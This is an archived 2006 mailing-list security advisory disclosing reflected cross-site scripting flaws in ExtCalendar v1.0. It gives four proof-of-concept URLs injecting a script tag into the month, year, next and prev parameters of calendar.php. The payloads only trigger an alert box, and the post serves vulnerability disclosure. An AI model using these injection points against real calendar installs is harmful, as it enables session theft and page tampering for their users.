|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
ExtCalendar v1.0 Multiple Xss Vuln
Soothackers
gmail.com
Date: Sun Mar 19 2006 - 11:32:34 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
------------------------------------------
ExtCalendar v1.0 Multiple Xss Vuln
------------------------------------------
Bug:
http://victim/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script>
http://victim/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006
http://victim/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script>
http://victim/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>
Vulnerable:
ExtCalendar 1
Not Vulnerable:
ExtCalendar 2
------------------------------------------
Source :
http://soot.shabgard.org/ExtCalendar.txt
Credit :
Soot
Shabgard Security Team
http://www.shabgard.org
Greetz :
Hergy,Elite,Bl2k,Littlehacker,...
------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]